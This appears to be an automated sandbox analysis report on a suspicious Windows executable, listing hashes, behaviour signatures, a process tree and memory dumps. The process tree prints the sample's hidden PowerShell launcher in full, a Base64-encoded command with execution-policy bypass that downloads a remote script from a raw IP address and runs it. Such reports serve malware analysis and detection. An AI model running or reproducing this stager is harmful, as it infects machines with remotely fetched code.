Overview

overview

10

Static

static

10

ekeng-mta.exe

windows7-x64

1

ekeng-mta.exe

windows10-2004-x64

10

mta.dll

windows7-x64

1

mta.dll

windows10-2004-x64

1

mta.ps1

windows7-x64

10

mta.ps1

windows10-2004-x64

10

Resubmissions

23-09-2023 06:54

230923-hpl7dsdf3x 10

22-09-2023 05:10

230922-ftprzafc57 10

Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    22-09-2023 05:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ekeng-mta.exe

  • Size

    3.5MB

  • MD5

    cbbad2e2170ee73c2bfdacdade718d29

  • SHA1

    dcab4fafa0387c0b4f5b700763cea78afb092024

  • SHA256

    3a679cb98f88d7d6bd84dcfe9717238c08c05942055bdb798103224e7f2f2ca9

  • SHA512

    a4133f07ad8de23c82e164ee2bee32704efaf119cd4f1142145fca8688094b485317722db030e70fadeb8237a20dbded71f9340cafad8cdd982a1011da6fccca

  • SSDEEP

    98304:R/YJIkkCBJroBdDv6Lj9uGQdT7Nx2Yn686n:R/0

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ekeng-mta.exe
    "C:\Users\Admin\AppData\Local\Temp\ekeng-mta.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAMwA5AC4AOAA0AC4AMgAzADEALgAxADkAOQA6ADgAMAA4ADAALwBnAGUAdAAvAGoANgBGADIAZgBRAG4AUgBPADQALwBtAHQAYQAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIABpAGUAeAA=
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1704
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAMwA5AC4AOAA0AC4AMgAzADEALgAxADkAOQA6ADgAMAA4ADAALwBnAGUAdAAvAGoANgBGADIAZgBRAG4AUgBPADQALwBtAHQAYQAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIABpAGUAeAA=
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2696

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1936-12-0x0000000000400000-0x000000000058F000-memory.dmp

    Filesize

    1.6MB

    Download

  • memory/2696-4-0x000000001B390000-0x000000001B672000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2696-5-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2696-6-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2696-7-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2696-8-0x00000000029F0000-0x0000000002A70000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2696-9-0x00000000029F0000-0x0000000002A70000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2696-10-0x00000000029F0000-0x0000000002A70000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2696-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download